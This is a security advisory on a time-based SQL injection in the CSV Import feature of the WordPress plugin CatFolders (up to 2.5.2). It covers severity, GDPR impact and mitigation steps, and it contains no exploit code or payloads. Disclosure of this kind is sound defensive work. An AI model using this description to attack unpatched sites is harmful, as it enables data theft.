CVE-2025-9776 is a medium-severity SQL Injection vulnerability affecting the WordPress plugin 'CatFolders – Tame Your WordPress Media Library by Category' in all versions up to and including 2.5.2. The vulnerability arises from improper neutralization of special elements used in SQL commands (CWE-89). Specifically, the plugin fails to properly escape user-supplied input in the CSV Import functionality, allowing authenticated users with Author-level privileges or higher to inject malicious SQL code into existing queries. This is a time-based SQL Injection, meaning attackers can exploit the vulnerability by measuring response delays to infer sensitive information from the database. The vulnerability does not require user interaction beyond authentication, and the attack vector is network-based with low attack complexity. The impact is primarily on confidentiality, as attackers can extract sensitive data from the database without affecting data integrity or availability. No known exploits are reported in the wild as of the publication date. The CVSS v3.1 base score is 6.5, reflecting a medium severity level. The vulnerability requires an attacker to have at least Author-level access, which limits the attack surface to users who already have some level of trust within the WordPress environment. However, given the widespread use of WordPress and the popularity of media management plugins, this vulnerability poses a significant risk if exploited, especially in environments where multiple users have elevated privileges. No patches or updates are currently linked, so mitigation relies on access control and monitoring until a fix is released.

For European organizations, this vulnerability could lead to unauthorized disclosure of sensitive data stored in WordPress databases, including user information, media metadata, or other confidential content managed via the CatFolders plugin. Since the attack requires authenticated access at Author level or above, the risk is heightened in organizations with multiple content contributors or editors. Exploitation could facilitate data breaches, potentially violating GDPR requirements concerning data confidentiality and protection. The exposure of sensitive data could damage organizational reputation, lead to regulatory fines, and disrupt business operations. Additionally, attackers might leverage extracted data for further attacks such as phishing or lateral movement within the network. The vulnerability does not directly impact data integrity or availability, but the confidentiality breach alone is significant. European organizations using WordPress with this plugin should consider the risk in the context of their user privilege management and data sensitivity.

1. Immediately restrict Author-level and higher privileges to trusted users only, minimizing the number of accounts that can exploit this vulnerability. 2. Implement strict user access reviews and enforce the principle of least privilege for WordPress roles. 3. Monitor and audit WordPress user activities, especially CSV import operations and database query logs, to detect suspicious behavior indicative of SQL Injection attempts. 4. Temporarily disable the CSV Import feature in the CatFolders plugin if feasible until a security patch is released. 5. Employ Web Application Firewalls (WAFs) with custom rules to detect and block SQL Injection patterns targeting the plugin's endpoints. 6. Keep WordPress core and all plugins updated; watch for official patches or updates from the CatFolders plugin vendor addressing this vulnerability. 7. Conduct security awareness training for content authors and editors about the risks of elevated privileges and safe usage practices. 8. Consider isolating WordPress instances or databases to limit potential lateral impact in case of exploitation.